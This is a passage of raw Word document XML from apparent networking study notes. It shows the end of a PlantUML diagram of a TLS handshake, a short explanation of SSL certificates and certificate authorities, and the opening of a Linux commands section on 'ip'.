          <w:p w14:paraId="499F27A0" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    First encrypted message using session keys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79BFFBAA" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5526A117" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  |||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45FEE4C5" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Server -&gt; Server: Derive session keys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E9B253E" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note over Client, Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00F0A6E6" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Uses pre-master secret + randoms to generate symmetric keys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B3F8432" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EBF464F" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  |||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AF9295D" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Server -&gt; Client: Send ChangeCipherSpec</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53B4C314" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note over Client, Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58ACBE7D" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Server switches to symmetric encryption</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7614B4A6" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13632C15" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  |||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E9EEB22" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Server -&gt; Client: Send Finished</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11AF5876" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note over Client, Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EE169EE" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    Server confirms handshake completion</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78A998BD" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D557D3A" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  |||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73B1E991" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B5A552B" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2381FEE8" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>group Secure Data Transfer Phase</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D1CCB2B" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Client -&gt; Server: Application Data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64AB15FF" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note over Client, Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1277CEA0" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Encrypted with symmetric keys  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="193E94B0" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Integrity protected with MAC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10DADF22" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37AEE1DC" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  |||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B1B8BD7" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Server -&gt; Client: Application Data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AD0858D" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note over Client, Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CA0793F" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Encrypted with symmetric keys  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="235825A7" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Integrity protected with MAC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07A94140" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0338F5F7" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  |||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B40C3AC" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E9F6724" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0444AFC4" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>group Session Termination</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A17A3F4" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Client -&gt; Server: CloseNotify</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F9B8DB" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note over Client, Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22359502" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Alert Protocol message to close session cleanly</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA23355" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75983A43" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  |||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C001C3D" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  Server -&gt; Client: CloseNotify</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B4852C2" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note over Client, Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="009BCD66" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    - Confirms closure and discards session keys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74236B43" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DD6E5CD" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  |||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="083A9D40" w14:textId="77777777" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>end</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6818ADF5" w14:textId="4BAF676E" w:rsidR="00CF327E" w:rsidRPr="00CF327E" w:rsidRDefault="00CF327E" w:rsidP="00CF327E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF327E">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EDACA9A" w14:textId="40E87EC0" w:rsidR="00A84823" w:rsidRDefault="00A84823" w:rsidP="00A84823">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SSL </w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>ertificate</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7339A4B9" w14:textId="325350E9" w:rsidR="00A84823" w:rsidRDefault="00A84823" w:rsidP="00A84823">
      <w:r>
        <w:t>An SSL certificate is a file installed on a website's origin server. It's simply a data file containing the public key and the identity of the website owner, along with other information. Without an SSL certificate, a website's traffic can't be encrypted with TLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D350FA" w14:textId="7FE40547" w:rsidR="00A84823" w:rsidRDefault="00A84823" w:rsidP="00A84823">
      <w:r>
        <w:t xml:space="preserve">Technically, any website owner can create their own SSL certificate, and such certificates are called </w:t>
      </w:r>
      <w:r w:rsidRPr="006B4283">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>self-signed certificates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. However, browsers do not consider self-signed certificates to be as trustworthy as SSL certificates issued by a </w:t>
      </w:r>
      <w:r w:rsidRPr="006B4283">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>certificate authority</w:t>
      </w:r>
      <w:r w:rsidR="00926DD5">
        <w:t xml:space="preserve"> (CA)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239C85FD" w14:textId="5773CE29" w:rsidR="00A84823" w:rsidRPr="00662873" w:rsidRDefault="00A84823" w:rsidP="00A84823">
      <w:r>
        <w:t xml:space="preserve">Website owners need to obtain an SSL certificate from a </w:t>
      </w:r>
      <w:r w:rsidR="00926DD5">
        <w:t>CA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and then install it on their web server (often a web host can handle this process). </w:t>
      </w:r>
      <w:r w:rsidR="00926DD5">
        <w:t>The CA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is an outside party who can confirm that the website owner is who they say they are. They keep a copy of the certificates they issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D0AB9D" w14:textId="77777777" w:rsidR="00B70163" w:rsidRPr="00E9253D" w:rsidRDefault="00B70163" w:rsidP="00B70163"/>
    <w:p w14:paraId="7D548424" w14:textId="77777777" w:rsidR="00B70163" w:rsidRDefault="00B70163" w:rsidP="00B70163">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial Black" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="478B5709" w14:textId="5A6FFF5F" w:rsidR="003E2459" w:rsidRDefault="001A7888" w:rsidP="00C75443">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Linux Command</w:t>
      </w:r>
      <w:r w:rsidR="006F0EF8">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0092E35B" w14:textId="4601A48F" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Interface Configuration Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E28D1E2" w14:textId="0CBEE9B2" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F088AF2" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
